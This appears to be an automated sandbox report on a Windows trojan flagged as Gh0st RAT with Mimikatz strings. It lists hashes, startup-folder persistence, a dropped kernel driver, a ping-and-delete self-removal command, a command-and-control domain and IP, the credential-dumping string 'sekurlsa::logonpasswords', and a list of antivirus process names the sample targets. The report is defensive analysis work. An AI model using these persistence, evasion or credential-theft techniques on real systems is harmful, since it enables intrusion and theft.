Play interactive tour

Edit tour

Analysis Report OII9x4FeW7.exe

Overview

General Information

Sample Name:	OII9x4FeW7.exe
Analysis ID:	356280
MD5:	ff7d3b6003c9058e40ae38a6a7efe40c
SHA1:	842bbfb81f4a65112bc2d8e4aff8b976e5db9a55
SHA256:	c3304ec52968793ae709cf7c7caad6acae0bded8088f06cefbee55bde0a9224f
Tags:	exeYoungLotus
Most interesting Screenshot:

Detection

Mimikatz

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Mimikatz

Drops PE files to the startup folder

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample is not signed and drops a device driver

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

AV process strings found (often used to terminate AV products)

Contains capabilities to detect virtual machines

Contains functionality to dynamically determine API calls

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates driver files

Creates files inside the driver directory

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Enables driver privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains strange resources

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Spawns drivers

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

OII9x4FeW7.exe (PID: 3604 cmdline: 'C:\Users\user\Desktop\OII9x4FeW7.exe' MD5: FF7D3B6003C9058E40AE38A6A7EFE40C)

Ogxog.exe (PID: 6188 cmdline: 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Ogxog.exe' MD5: FF7D3B6003C9058E40AE38A6A7EFE40C)

cmd.exe (PID: 6204 cmdline: C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\user\Desktop\OII9X4~1.EXE > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 6312 cmdline: ping -n 2 127.0.0.1 MD5: 70C24A306F768936563ABDADB9CA9108)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
Process Memory Space: OII9x4FeW7.exe PID: 3604	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
Process Memory Space: Ogxog.exe PID: 6188	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.OII9x4FeW7.exe.10101928.5.raw.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x22ff0:$x4: Http/1.1 403 Forbidden 0x22ff0:$s5: Http/1.1 403 Forbidden
1.2.OII9x4FeW7.exe.10101928.5.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x22fa7:$x1: sekurlsa::logonpasswords
1.2.OII9x4FeW7.exe.10101928.5.raw.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
2.2.Ogxog.exe.10101928.4.raw.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x22ff0:$x4: Http/1.1 403 Forbidden 0x22ff0:$s5: Http/1.1 403 Forbidden
2.2.Ogxog.exe.10101928.4.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x22fa7:$x1: sekurlsa::logonpasswords
2.2.Ogxog.exe.10101928.4.raw.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
1.2.OII9x4FeW7.exe.10110f70.4.raw.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x139a8:$x4: Http/1.1 403 Forbidden 0x139a8:$s5: Http/1.1 403 Forbidden
1.2.OII9x4FeW7.exe.10110f70.4.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x1395f:$x1: sekurlsa::logonpasswords
1.2.OII9x4FeW7.exe.10110f70.4.raw.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
2.2.Ogxog.exe.10110f70.5.raw.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x139a8:$x4: Http/1.1 403 Forbidden 0x139a8:$s5: Http/1.1 403 Forbidden
2.2.Ogxog.exe.10110f70.5.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x1395f:$x1: sekurlsa::logonpasswords
2.2.Ogxog.exe.10110f70.5.raw.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
Click to see the 7 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: OII9x4FeW7.exe

Avira: detected

Antivirus detection for dropped file

Show sources

Source: C:\Windows\System32\drivers\QAssist.sys	Avira: detection malicious, Label: RKIT/Agent.ccibt
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen

Multi AV Scanner detection for dropped file

Show sources

Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe	ReversingLabs: Detection: 76%
Source: C:\Windows\System32\drivers\QAssist.sys	ReversingLabs: Detection: 46%

Multi AV Scanner detection for submitted file

Show sources

Source: OII9x4FeW7.exe	Virustotal: Detection: 73%			Perma Link
Source: OII9x4FeW7.exe	ReversingLabs: Detection: 76%

Machine Learning detection for dropped file

Show sources

Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: OII9x4FeW7.exe

Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files

Show sources

Source: OII9x4FeW7.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Binary contains paths to debug symbols

Show sources

Source:	Binary string: F:\hidden-master\x64\Debug\QAssist.pdb source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp, QAssist.sys.2.dr
Source:	Binary string: F:\hidden-master\Debug\QAssist.pdb source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp

Networking:

Uses ping.exe to check the status of other devices and networks

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\PING.EXE ping -n 2 127.0.0.1

Source: global traffic

TCP traffic: 192.168.2.5:49708 -> 58.218.67.253:281

Source: unknown

DNS traffic detected: queries for: s2010218.f3322.net

Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	String found in binary or memory: http://ptlogin2.qun.qq.com%s
Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	String found in binary or memory: http://qun.qq.com%s
Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	String found in binary or memory: https://localhost.ptlogin2.qq.com:4301%s
Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	String found in binary or memory: https://ssl.ptlogin2.qq.com%s
Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	String found in binary or memory: https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 1.2.OII9x4FeW7.exe.10101928.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 1.2.OII9x4FeW7.exe.10101928.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 2.2.Ogxog.exe.10101928.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 2.2.Ogxog.exe.10101928.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 1.2.OII9x4FeW7.exe.10110f70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 1.2.OII9x4FeW7.exe.10110f70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 2.2.Ogxog.exe.10110f70.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 2.2.Ogxog.exe.10110f70.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth

Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe

File created: C:\Windows\system32\drivers\QAssist.sys

Jump to behavior

Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe

File created: C:\Windows\system32\drivers\QAssist.sys

Jump to behavior

Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe

File created: C:\Windows\system32\drivers\QAssist.sys

Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\Windows\System32\drivers\QAssist.sys 6CCE28B275D5EC20992BB13790976CAF434AB46DDBFD5CFD431D33424943122B

Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe

Process token adjusted: Load Driver

Jump to behavior

Source: OII9x4FeW7.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: OII9x4FeW7.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Ogxog.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Ogxog.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: OII9x4FeW7.exe, 00000001.00000002.246831697.00000000007A0000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs OII9x4FeW7.exe
Source: OII9x4FeW7.exe, 00000001.00000002.246831697.00000000007A0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs OII9x4FeW7.exe
Source: OII9x4FeW7.exe, 00000001.00000002.247283379.0000000002500000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs OII9x4FeW7.exe

Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe

Driver loaded: \Registry\Machine\System\CurrentControlSet\Services\QAssist

Jump to behavior

Source: OII9x4FeW7.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 1.2.OII9x4FeW7.exe.10101928.5.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.OII9x4FeW7.exe.10101928.5.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.Ogxog.exe.10101928.4.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.Ogxog.exe.10101928.4.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 1.2.OII9x4FeW7.exe.10110f70.4.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.OII9x4FeW7.exe.10110f70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.Ogxog.exe.10110f70.5.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.Ogxog.exe.10110f70.5.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Source: QAssist.sys.2.dr	Binary string: \Device\QAssist\DosDevices\QAssist
Source: QAssist.sys.2.dr	Binary string: \Device\

Source: classification engine

Classification label: mal100.troj.adwa.evad.winEXE@8/4@3/2

Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\87S2tba0tb7QCLOztLTQEAn6pg==
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6268:120:WilError_01

Source: C:\Users\user\Desktop\OII9x4FeW7.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\OII9x4FeW7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: OII9x4FeW7.exe	Virustotal: Detection: 73%
Source: OII9x4FeW7.exe	ReversingLabs: Detection: 76%

Source: C:\Users\user\Desktop\OII9x4FeW7.exe

File read: C:\Users\user\Desktop\OII9x4FeW7.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\OII9x4FeW7.exe 'C:\Users\user\Desktop\OII9x4FeW7.exe'
Source: unknown	Process created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Ogxog.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\user\Desktop\OII9X4~1.EXE > nul
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 2 127.0.0.1
Source: C:\Users\user\Desktop\OII9x4FeW7.exe	Process created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Ogxog.exe'	Jump to behavior
Source: C:\Users\user\Desktop\OII9x4FeW7.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\user\Desktop\OII9X4~1.EXE > nul	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 2 127.0.0.1	Jump to behavior

Source: C:\Users\user\Desktop\OII9x4FeW7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source:	Binary string: F:\hidden-master\x64\Debug\QAssist.pdb source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp, QAssist.sys.2.dr
Source:	Binary string: F:\hidden-master\Debug\QAssist.pdb source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp

Data Obfuscation:

Source: C:\Users\user\Desktop\OII9x4FeW7.exe

Code function: 1_2_0045F704 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_0045F704

Source: initial sample

Static PE information: section where entry point is pointing to: .data

Source: Ogxog.exe.1.dr	Static PE information: real checksum: 0x6fb56 should be: 0x66380
Source: OII9x4FeW7.exe	Static PE information: real checksum: 0x6fb56 should be: 0x66380

Source: C:\Users\user\Desktop\OII9x4FeW7.exe	Code function: 1_2_0045E860 push eax; ret		1_2_0045E88E
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe	Code function: 2_2_0045E860 push eax; ret		2_2_0045E88E

Persistence and Installation Behavior:

Sample is not signed and drops a device driver

Show sources

Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe

File created: C:\Windows\system32\drivers\QAssist.sys

Jump to behavior

Source: C:\Users\user\Desktop\OII9x4FeW7.exe	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe			Jump to dropped file
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe	File created: C:\Windows\System32\drivers\QAssist.sys			Jump to dropped file

Source: C:\Users\user\Desktop\OII9x4FeW7.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe

Jump to dropped file

Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe

File created: C:\Windows\System32\drivers\QAssist.sys

Jump to dropped file

Boot Survival:

Drops PE files to the startup folder

Show sources

Source: C:\Users\user\Desktop\OII9x4FeW7.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe

Jump to dropped file

Source: C:\Users\user\Desktop\OII9x4FeW7.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe\:Zone.Identifier:$DATA

Jump to behavior

Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\QAssist

Jump to behavior

Source: C:\Users\user\Desktop\OII9x4FeW7.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe\:Zone.Identifier:$DATA

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\Desktop\OII9x4FeW7.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\OII9x4FeW7.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\OII9x4FeW7.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Uses ping.exe to sleep

Show sources

Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 2 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 2 127.0.0.1			Jump to behavior

Source: C:\Users\user\Desktop\OII9x4FeW7.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe	Window / User API: threadDelayed 509			Jump to behavior
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe	Window / User API: threadDelayed 407			Jump to behavior

Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe

Dropped PE file which has not been started: C:\Windows\System32\drivers\QAssist.sys

Jump to dropped file

Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe TID: 6236	Thread sleep count: 509 > 30	Jump to behavior
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe TID: 6236	Thread sleep time: -30540000s >= -30000s	Jump to behavior
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe TID: 6192	Thread sleep count: 407 > 30	Jump to behavior
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe TID: 6236	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe	Last function: Thread delayed
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Anti Debugging:

Source: C:\Users\user\Desktop\OII9x4FeW7.exe

Code function: 1_2_0045F704 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_0045F704

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Users\user\Desktop\OII9x4FeW7.exe	Process created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Ogxog.exe'	Jump to behavior
Source: C:\Users\user\Desktop\OII9x4FeW7.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\user\Desktop\OII9X4~1.EXE > nul	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 2 127.0.0.1	Jump to behavior

Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	Binary or memory string: Progman
Source: Ogxog.exe, 00000002.00000002.512918682.0000000000D10000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: Ogxog.exe, 00000002.00000002.512918682.0000000000D10000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: Ogxog.exe, 00000002.00000002.512918682.0000000000D10000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndProgman%s.exeBITS -inst.sys\system32\drivers\\sysnative\drivers\SYSTEM\CurrentControlSet\Services\BITSSYSTEM\SelectMarkTimeSYSTEM\CurrentControlSet\Services\\Registry\Machine\System\CurrentControlSet\Services\%SZwUnloadDriverNTDLL.DLLRtlInitUnicodeStringSeLoadDriverPrivilegeCreateEventACloseHandleWaitForSingleObject

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\OII9x4FeW7.exe

Code function: 1_2_0045C790 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,

1_2_0045C790

Lowering of HIPS / PFW / Operating System Security Settings:

Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	Binary or memory string: acs.exe
Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	Binary or memory string: vsserv.exe
Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	Binary or memory string: avcenter.exe
Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	Binary or memory string: kxetray.exe
Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	Binary or memory string: avp.exe
Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	Binary or memory string: cfp.exe
Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	Binary or memory string: KSafeTray.exe
Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	Binary or memory string: rtvscan.exe
Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	Binary or memory string: 360tray.exe
Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	Binary or memory string: ashDisp.exe
Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	Binary or memory string: TMBMSRV.exe
Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	Binary or memory string: avgwdsvc.exe
